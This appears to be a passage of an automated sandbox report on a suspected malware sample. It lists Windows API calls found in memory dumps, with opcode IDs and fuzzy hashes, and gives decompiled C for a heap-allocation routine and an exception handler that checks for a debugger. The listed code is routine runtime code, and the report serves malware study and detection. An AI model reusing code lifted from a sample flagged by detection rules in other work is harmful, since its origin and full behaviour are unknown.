            • Instruction Fuzzy Hash: D551C0B1D103099FDB14CFE9D984ADEBFB1BF88314F24822AE819AB214D7749945CF90
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 022CFD0A
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: CreateWindow
            • String ID:
            • API String ID: 716092398-0
            • Opcode ID: 10924ce9e25319c3141a77c56a73c95f68989a9c8924dae83dd775da0ed334a1
            • Instruction ID: f9fcd7668c0c03b8a2608478628f51ac5eef57a7acea80e19d41fe2d53cfcb80
            • Opcode Fuzzy Hash: 10924ce9e25319c3141a77c56a73c95f68989a9c8924dae83dd775da0ed334a1
            • Instruction Fuzzy Hash: A841C1B1D103099FDF14CFE9D984ADEBBB5BF48314F24822AE819AB214D7749945CF90
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateActCtxA.KERNEL32(?), ref: 051C46B1
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: Create
            • String ID:
            • API String ID: 2289755597-0
            • Opcode ID: 4d1d7c8702f030ee58d2680182f8562fe4c485e9467c1d8008d36e51cf365c4f
            • Instruction ID: e86cbfda417d174da39d1fec360ec864abc7e46ead07937964eeb3578440522b
            • Opcode Fuzzy Hash: 4d1d7c8702f030ee58d2680182f8562fe4c485e9467c1d8008d36e51cf365c4f
            • Instruction Fuzzy Hash: 164112B0C08758CBDF24DFA9C884BCEBBB5BF59304F20806AD908AB251D7B56945CF90
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CallWindowProcW.USER32(?,?,?,?,?), ref: 051C2531
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: CallProcWindow
            • String ID:
            • API String ID: 2714655100-0
            • Opcode ID: dd90729ccb7308595b3e7e75c5cfb1af7aaad763796d87b2de3c82ea836378a5
            • Instruction ID: 17566070d8ec6f657c0c54da5408bdb5364b226c57cd908a9c9cc343705d2bdc
            • Opcode Fuzzy Hash: dd90729ccb7308595b3e7e75c5cfb1af7aaad763796d87b2de3c82ea836378a5
            • Instruction Fuzzy Hash: 80411AB8A003058FDB14CF99C448BAABBF6FB98314F148499D559AB321D375A841CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 051CB957
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: CreateFromIconResource
            • String ID:
            • API String ID: 3668623891-0
            • Opcode ID: afbbb19be193088cb8ae9f6e89f6dba553c08eaeacf3b75ad48e0e463fa2dfe9
            • Instruction ID: 762e33d33cfc104ee012c42c798745f9b27b790e21981712b4dd426ba8cbda49
            • Opcode Fuzzy Hash: afbbb19be193088cb8ae9f6e89f6dba553c08eaeacf3b75ad48e0e463fa2dfe9
            • Instruction Fuzzy Hash: E0318C71908389AFDB01CFA9D805BDEBFF4EF19310F04845AE954A7251C3359855DBA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 022CBD87
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: c85ed8778541cf877c376ca4e728f125752cf2220ae1cbac7f97f09203a258d0
            • Instruction ID: 817c7c008d5782174edbaf18e7535da6bf97eb9323c9f0fed4dd07e7bd0b528b
            • Opcode Fuzzy Hash: c85ed8778541cf877c376ca4e728f125752cf2220ae1cbac7f97f09203a258d0
            • Instruction Fuzzy Hash: 5521D2B5D002499FDB10CFA9D484ADEFFF4EB48314F24811AE958A7250C379A955CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 022CBD87
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: 9d0db13649acee99ffb64ec23dae719b89a7ec29fdef3e0fac6738a925014c0e
            • Instruction ID: 9d5dd8c449fb3b38d98c191ca7cda313d9609113080ad7b7ea09295850da57bb
            • Opcode Fuzzy Hash: 9d0db13649acee99ffb64ec23dae719b89a7ec29fdef3e0fac6738a925014c0e
            • Instruction Fuzzy Hash: 3E21E3B5D002089FDB10CFA9D484ADEBBF8EB48314F14811AE918A7310C378A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 022C7F5D
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: CallbackDispatcherUser
            • String ID:
            • API String ID: 2492992576-0
            • Opcode ID: c22081e347f45a87822eb6fd15764457a2efe0212ca49fb5b3af8e33a87887f8
            • Instruction ID: 6f0c217820e7e252e0feb5e64bce6c7fce25ee3b8bde72bc2edd399b6dadfc8d
            • Opcode Fuzzy Hash: c22081e347f45a87822eb6fd15764457a2efe0212ca49fb5b3af8e33a87887f8
            • Instruction Fuzzy Hash: 4821DC708087C58FDB11CFE9C8443EABFF8EB0A314F1485AED494A7252C3789606CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,022C96A9,00000800,00000000,00000000), ref: 022C98BA
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 84e4823df0bbd526732a496b66a060c08ba9545c7ba8e6d2380cf69154ade881
            • Instruction ID: 87c5f984bb4f287b2a465b77a86dfbb5176235affd5e7beed87708385726622b
            • Opcode Fuzzy Hash: 84e4823df0bbd526732a496b66a060c08ba9545c7ba8e6d2380cf69154ade881
            • Instruction Fuzzy Hash: 361114B6D042098FDB10CF9AD444BEEFBF4EB88314F54862EE919A7600C375A945CFA5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,022C96A9,00000800,00000000,00000000), ref: 022C98BA
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 973762d1f32f33c1aec98e4b7d3aeae7bb89769fe74a259611e8d19adf864f2e
            • Instruction ID: 0c6705f01681e3c27606ebbbbf44a13a3a7d69f576bce0ee1df3751a373f4d91
            • Opcode Fuzzy Hash: 973762d1f32f33c1aec98e4b7d3aeae7bb89769fe74a259611e8d19adf864f2e
            • Instruction Fuzzy Hash: A41103B6D042498FDB10CF9AD444BDEFBF4EB89314F54852ED829A7200C379A946CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • PostMessageW.USER32(?,00AB53E8,00000000,?), ref: 051CE73D
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: d6624552fb05cb856e15f6ec7612f95e736abbe25496f7e4aab0c678cfa8ec65
            • Instruction ID: 904e6d807cf063aa27d5f419d94a0efd8edbcc12458a5c50fa80af0fa9149704
            • Opcode Fuzzy Hash: d6624552fb05cb856e15f6ec7612f95e736abbe25496f7e4aab0c678cfa8ec65
            • Instruction Fuzzy Hash: 811146B18003498FDB10CF99C485BDEFBF8EB48314F14842AE914A7640D379A545CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 051CB957
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: CreateFromIconResource
            • String ID:
            • API String ID: 3668623891-0
            • Opcode ID: d9b18283b26d6943008326029a51db6e8066b2d52fb337b2ffc3ed4ce27fb6a7
            • Instruction ID: 9bae0b0a4cfb05c1a2ffd2db9c9cb93571eb03d0845bc19751fd224e94d3923e
            • Opcode Fuzzy Hash: d9b18283b26d6943008326029a51db6e8066b2d52fb337b2ffc3ed4ce27fb6a7
            • Instruction Fuzzy Hash: 461146B1804249DFDB10CFAAD844BDEBFF8EF58320F14841AE954A7210C379A954CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • PostMessageW.USER32(?,00AB53E8,00000000,?), ref: 051CE73D
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: effb532a9e779cac41192fd348398b9a867a0eafd65037f56d4e6fbbb53ae57d
            • Instruction ID: 5a8244c0dd2791062bd4c03ea21a81d34a33677a3c8eec2b086eee6336dd3158
            • Opcode Fuzzy Hash: effb532a9e779cac41192fd348398b9a867a0eafd65037f56d4e6fbbb53ae57d
            • Instruction Fuzzy Hash: EE1116B58003499FDB20CF99C445BEEBBF8FB58310F10846AE954A7240D379A945CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SendMessageW.USER32(?,00000018,00000001,?), ref: 051CD29D
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: 69ade8f09ee07199e28bfaf6cfd38d982eeeda160cb15d39b9e961d82b0b3841
            • Instruction ID: cdf12d345d2adb99355a9fdbf5b33fd4119eb6891e6b864a1712f338ed421811
            • Opcode Fuzzy Hash: 69ade8f09ee07199e28bfaf6cfd38d982eeeda160cb15d39b9e961d82b0b3841
            • Instruction Fuzzy Hash: 8011F2B59002489FDB20CF99D889BDEFFF8FB58310F10851AE859A7600C375A645CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SetWindowLongW.USER32(?,?,?), ref: 022CFE9D
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: LongWindow
            • String ID:
            • API String ID: 1378638983-0
            • Opcode ID: d84efdd990bce99d671289a0a21a562e110daa774b24703499de1708c4f31a1a
            • Instruction ID: 1065ad63bbd030888b2f21c6797dc3f6aed508a14310043f1b0504cf0930fab6
            • Opcode Fuzzy Hash: d84efdd990bce99d671289a0a21a562e110daa774b24703499de1708c4f31a1a
            • Instruction Fuzzy Hash: E51136B5D002098FDB10CF99D584BDEFBF4EB48324F20851AD859A7741C374A945CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,051C226A,?,00000000,?), ref: 051CC435
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: 38d34419894846177a443b811ac67e5ebf6302c8c3d04c295209cba78c311958
            • Instruction ID: 03fbf471fc24b35bf87b017068642a602b3d07dc1a92afe5cc6c7cdec29d8bf2
            • Opcode Fuzzy Hash: 38d34419894846177a443b811ac67e5ebf6302c8c3d04c295209cba78c311958
            • Instruction Fuzzy Hash: 0D1103B58002489FDB10CF99D489BDEFFF8FB58324F50885AE868A7600C375A945CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 051CBCBD
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: 5d14829989531930b1854249c49e1b63a321099de860878ae6958a58ebef3297
            • Instruction ID: a42ff150ba1610350a17f4107f5f6849be4bd9051047021dbc6139e0d19f2188
            • Opcode Fuzzy Hash: 5d14829989531930b1854249c49e1b63a321099de860878ae6958a58ebef3297
            • Instruction Fuzzy Hash: 6E1110B58043489FDB20CF99C489BDEBBF8EB48310F10885AE918A7300C375A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,051C226A,?,00000000,?), ref: 051CC435
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: b165d3d236109801be35905e5703a7df355b6da75ba32eac9747f9bec05cb2ee
            • Instruction ID: 611880c73501ffc423b5d0d13d7bd3b1c1ec5a8dbe0925e21bf18aba0fa86dac
            • Opcode Fuzzy Hash: b165d3d236109801be35905e5703a7df355b6da75ba32eac9747f9bec05cb2ee
            • Instruction Fuzzy Hash: FE11E3B58043489FDB20CF99D444BDEBFF8EB58314F10845AE959A7600C375A945CFE1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SendMessageW.USER32(?,00000018,00000001,?), ref: 051CD29D
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: 4e349e780e2655565142c4409c0e2eb0238f67d321f20b1c69ce05237caf9be0
            • Instruction ID: b3d9c3ef09193e84354ed68ba3665c13b9c30965230f5ac73bd228313bbc77f8
            • Opcode Fuzzy Hash: 4e349e780e2655565142c4409c0e2eb0238f67d321f20b1c69ce05237caf9be0
            • Instruction Fuzzy Hash: 2A11E0B58042489FDB20CF99D488BDEFBF8EB58310F10846AE919A7200C375A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetModuleHandleW.KERNELBASE(00000000), ref: 022C962E
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: HandleModule
            • String ID:
            • API String ID: 4139908857-0
            • Opcode ID: 4a01706d877bf08914a6e85e076a8f9f266c2813faa708a966775cda28c7c3fd
            • Instruction ID: ceb27ec32c0adab87910af080bef08c9ff32000e1b8641a24707e88e87986cbe
            • Opcode Fuzzy Hash: 4a01706d877bf08914a6e85e076a8f9f266c2813faa708a966775cda28c7c3fd
            • Instruction Fuzzy Hash: 5211E0B5D006498FDB20CF9AD444BDEFBF4AB88314F24852AD869A7640C375A546CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 051CBCBD
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: 126aead270306d2a2d61674a39af740cf4f537a30cebe71e7f9c80550d88025c
            • Instruction ID: 812efc1ff0360d5544f36905e2f43e941171026f32d89d1feae9bf6a53fefdb1
            • Opcode Fuzzy Hash: 126aead270306d2a2d61674a39af740cf4f537a30cebe71e7f9c80550d88025c
            • Instruction Fuzzy Hash: C911F2B58042489FDB10CF99D889BDEFFF8EB48310F10841AE918A7600C375A545CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SetWindowLongW.USER32(?,?,?), ref: 022CFE9D
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: LongWindow
            • String ID:
            • API String ID: 1378638983-0
            • Opcode ID: 7c1a61c7f960cc826a8bed3399822b1d4524dda67e43b38e75377b6d590a264a
            • Instruction ID: 07d141c697d00dc52b71db479baa78aafa56a16fb5079b21695d3702471d6cd1
            • Opcode Fuzzy Hash: 7c1a61c7f960cc826a8bed3399822b1d4524dda67e43b38e75377b6d590a264a
            • Instruction Fuzzy Hash: D01115B59002498FDB10CF99D584BDFFBF8EB48324F20851AD818A7740C374A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 94%
            E00403E3D(void* __ecx, long _a4) {
                void* _t4;
                void* _t6;
                void* _t7;
                long _t8;

                _t7 = __ecx;
                _t8 = _a4;                    // requested allocation size
                if(_t8 > 0xffffffe0) {        // above the largest size the heap will honour: fail with ENOMEM
                    L7:
                    *((intOrPtr*)(E00404831())) = 0xc;   // E00404831 returns the errno slot; 0xc == ENOMEM
                    __eflags = 0;
                    return 0;
                }
                if(_t8 == 0) {
                    _t8 = _t8 + 1;            // a zero-byte request still yields a distinct 1-byte block
                }
                while(1) {
                    _t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed; *0x4132b0 holds the CRT heap handle
                    if(_t4 != 0) {
                        break;                // success: return the block
                    }
                    // Allocation failed: E00403829 reports whether a retry hook is installed and
                    // E004068FD invokes it; the loop retries while the hook claims to have freed
                    // memory. This matches the CRT malloc / new-handler retry pattern.
                    __eflags = E00403829();
                    if(__eflags == 0) {
                        goto L7;
                    }
                    _t6 = E004068FD(_t7, __eflags, _t8);
                    _pop(_t7);
                    __eflags = _t6;
                    if(_t6 == 0) {
                        goto L7;
                    }
                }
                return _t4;
            }

            Instruction addresses (one per decompiled line, in listing order; 0x00000000 marks a line with no code of its own): 0x00403e3d, 0x00403e43, 0x00403e49, 0x00403e7b, 0x00403e80, 0x00403e86, 0x00000000, 0x00403e86, 0x00403e4d, 0x00403e4f, 0x00403e4f, 0x00403e66, 0x00403e6f, 0x00403e77, 0x00000000, 0x00000000, 0x00403e57, 0x00403e59, 0x00000000, 0x00000000, 0x00403e5c, 0x00403e61, 0x00403e62, 0x00403e64, 0x00000000, 0x00000000, 0x00403e64, 0x00000000

            APIs
            • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
            • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
            • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
            • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000002.00000002.905334535.0000000000A4D000.00000040.00000001.sdmp, Offset: 00A4D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 09e181571646fab02b154b36c8d3c70b51798e13813ff58a2571621cc130eae6
            • Instruction ID: d2ca6ed1b6440d7f5080a4583c1daaff20e65f8a9fd8ee4dd77e8c4d959c8f29
            • Opcode Fuzzy Hash: 09e181571646fab02b154b36c8d3c70b51798e13813ff58a2571621cc130eae6
            • Instruction Fuzzy Hash: 3B21FFB9608240DFDB01CF10D8C0F26BFA5FBD8324F258569E9094B20AC336D856CAA2
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000002.00000002.905334535.0000000000A4D000.00000040.00000001.sdmp, Offset: 00A4D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4cd168af5382a5f3b79a4005a7cb978bb665a625fff909facd1de11e375a819a
            • Instruction ID: 4e6cd1db5c62a66db082174dd0bd63ccd1666705beebe1e414c5fb5947d5310b
            • Opcode Fuzzy Hash: 4cd168af5382a5f3b79a4005a7cb978bb665a625fff909facd1de11e375a819a
            • Instruction Fuzzy Hash: A02103B5604240DFDB01DF10D8C0F26BF65FBC8328F24C569E9054B206C736D816CBA2
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000002.00000002.905358467.0000000000A5D000.00000040.00000001.sdmp, Offset: 00A5D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 381067b71ab18ab4fcfede9e131d770658490e5e24dd37ee4f5f86089a5567f2
            • Instruction ID: 04576ac74910b4bc42bee346c726ae7574bc732105acf5ab3e2bb11b82580b23
            • Opcode Fuzzy Hash: 381067b71ab18ab4fcfede9e131d770658490e5e24dd37ee4f5f86089a5567f2
            • Instruction Fuzzy Hash: D021F2B0604240EFDB21CF50D9C0B6ABBA5FB84315F24CA6DED094B246C376D84ACA61
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000002.00000002.905358467.0000000000A5D000.00000040.00000001.sdmp, Offset: 00A5D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d01c81b841efe660029345fff8d8486fee43bc18630c8cd5ef261f9cf3574fbe
            • Instruction ID: 812714ad889eaf552500a354d2ec0f64425522f36ade3a39716da490b8c8e97a
            • Opcode Fuzzy Hash: d01c81b841efe660029345fff8d8486fee43bc18630c8cd5ef261f9cf3574fbe
            • Instruction Fuzzy Hash: F921D775604244DFDB24DF14D4C4B16BB65FB84315F34C569DD4A4B286C33AD84BCB61
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000002.00000002.905358467.0000000000A5D000.00000040.00000001.sdmp, Offset: 00A5D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b7b08944f4130ee9e850c3dbd9a7e49a038f714d4d17a9321dd3843d68d52ee7
            • Instruction ID: 13d16721fd3f24b418c7888ccfacf4f21d0b359d47de42b1cba6986dad3f267a
            • Opcode Fuzzy Hash: b7b08944f4130ee9e850c3dbd9a7e49a038f714d4d17a9321dd3843d68d52ee7
            • Instruction Fuzzy Hash: F4215E755093C08FDB12CF20D994B15BF71FB46314F28C6EAD8498B697C33A980ACB62
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000002.00000002.905334535.0000000000A4D000.00000040.00000001.sdmp, Offset: 00A4D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2d1ced6dc2e75453a2601a127eb843bfa51fca63bdaac9e78988749db0cf302c
            • Instruction ID: 00445a8c0758d4e0d59564b2606d71bbe85c0c041a61742c8880607e0fa90ca6
            • Opcode Fuzzy Hash: 2d1ced6dc2e75453a2601a127eb843bfa51fca63bdaac9e78988749db0cf302c
            • Instruction Fuzzy Hash: 63117C76504280DFCF16CF14D9C4B16FF62FB98324F25C6A9D8094B656C33AD85ACBA2
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000002.00000002.905334535.0000000000A4D000.00000040.00000001.sdmp, Offset: 00A4D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2d1ced6dc2e75453a2601a127eb843bfa51fca63bdaac9e78988749db0cf302c
            • Instruction ID: 7a2edfa98ed5f9484cf9d60ca4dce4610025f8788a1c1028a681dd39cb703040
            • Opcode Fuzzy Hash: 2d1ced6dc2e75453a2601a127eb843bfa51fca63bdaac9e78988749db0cf302c
            • Instruction Fuzzy Hash: 24119376504280DFCF15CF14D5C4B16BF71FB94324F24C6A9D8494B656C336D856CBA2
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000002.00000002.905358467.0000000000A5D000.00000040.00000001.sdmp, Offset: 00A5D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 47f075cdb6666318d721bc5846118bef7950f0453c65f354d1bc6af126a2814c
            • Instruction ID: 8bc4d8239bceacb3a0b6b40637ebe4939650f36a80dbb211a4880d0d9c2648d1
            • Opcode Fuzzy Hash: 47f075cdb6666318d721bc5846118bef7950f0453c65f354d1bc6af126a2814c
            • Instruction Fuzzy Hash: 01118B75904280DFCB21CF10D5C4B59FBA1FB84324F24C6AEDC494B656C33AD85ACB62
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000002.00000002.905334535.0000000000A4D000.00000040.00000001.sdmp, Offset: 00A4D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f64deb071c9dc5dfb0d9ee6849a96f8529649027392536761e2ef0db0ed4c079
            • Instruction ID: 44fd112324b93ae4d265b2e8fc18ae50ee00a1bfecd15f498a9743bf4b2c3185
            • Opcode Fuzzy Hash: f64deb071c9dc5dfb0d9ee6849a96f8529649027392536761e2ef0db0ed4c079
            • Instruction Fuzzy Hash: E501DB7550C3809AEB104B25CC84B67FBD8EFD1364F18C55AED4A5B246C3799845C6B1
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000002.00000002.905334535.0000000000A4D000.00000040.00000001.sdmp, Offset: 00A4D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ff54fd01c076a61946635034c319ec78b0efd68f234c77d99b6bcab7d3b17de0
            • Instruction ID: 34fbcab56ff94ee0a8295d0d8205ae604fa6fcf9f63998ea626dd03883cbb0fe
            • Opcode Fuzzy Hash: ff54fd01c076a61946635034c319ec78b0efd68f234c77d99b6bcab7d3b17de0
            • Instruction Fuzzy Hash: 6AF06271408284AFEB108B15CC84B62FBD8EBD1724F18C55AED495B286C3799845CAB1
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            C-Code - Quality: 74%
            			E0040446F(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
            				char _v0;
            				signed int _v8;
            				intOrPtr _v524;
            				intOrPtr _v528;
            				void* _v532;
            				intOrPtr _v536;
            				char _v540;
            				intOrPtr _v544;
            				intOrPtr _v548;
            				intOrPtr _v552;
            				intOrPtr _v556;
            				intOrPtr _v560;
            				intOrPtr _v564;
            				intOrPtr _v568;
            				intOrPtr _v572;
            				intOrPtr _v576;
            				intOrPtr _v580;
            				intOrPtr _v584;
            				char _v724;
            				intOrPtr _v792;
            				intOrPtr _v800;
            				char _v804;
            				struct _EXCEPTION_POINTERS _v812;
            				void* __edi;
            				signed int _t40;
            				char* _t47;
            				char* _t49;
            				long _t57;
            				intOrPtr _t59;
            				intOrPtr _t60;
            				intOrPtr _t64;
            				intOrPtr _t65;
            				int _t66;
            				intOrPtr _t68;
            				signed int _t69;
            
            				_t68 = __esi;
            				_t64 = __edx;
            				_t59 = __ebx;
            				_t40 =  *0x412014; // 0xf8d2dd75
            				_t41 = _t40 ^ _t69;
            				_v8 = _t40 ^ _t69;
            				_push(_t65);
            				if(_a4 != 0xffffffff) {
            					_push(_a4);
            					E00401E6A(_t41);
            					_pop(_t60);
            				}
            				E00402460(_t65,  &_v804, 0, 0x50);
            				E00402460(_t65,  &_v724, 0, 0x2cc);
            				_v812.ExceptionRecord =  &_v804;
            				_t47 =  &_v724;
            				_v812.ContextRecord = _t47;
            				_v548 = _t47;
            				_v552 = _t60;
            				_v556 = _t64;
            				_v560 = _t59;
            				_v564 = _t68;
            				_v568 = _t65;
            				_v524 = ss;
            				_v536 = cs;
            				_v572 = ds;
            				_v576 = es;
            				_v580 = fs;
            				_v584 = gs;
            				asm("pushfd");
            				_pop( *_t22);
            				_v540 = _v0;
            				_t49 =  &_v0;
            				_v528 = _t49;
            				_v724 = 0x10001;
            				_v544 =  *((intOrPtr*)(_t49 - 4));
            				_v804 = _a8;
            				_v800 = _a12;
            				_v792 = _v0;
            				_t66 = IsDebuggerPresent();
            				SetUnhandledExceptionFilter(0);
            				_t57 = UnhandledExceptionFilter( &_v812);
            				if(_t57 == 0 && _t66 == 0 && _a4 != 0xffffffff) {
            					_push(_a4);
            					_t57 = E00401E6A(_t57);
            				}
            				E004018CC();
            				return _t57;
            			}

            APIs
            • IsDebuggerPresent.KERNEL32 ref: 00404567
            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404571
            • UnhandledExceptionFilter.KERNEL32(?), ref: 0040457E
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: ExceptionFilterUnhandled$DebuggerPresent
            • String ID:
            • API String ID: 3906539128-0
            • Opcode ID: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
            • Instruction ID: 1195a769eb9e4d04bd79abb1e2ff1cfbb043d98aa737aaf25acc392e7af51fe4
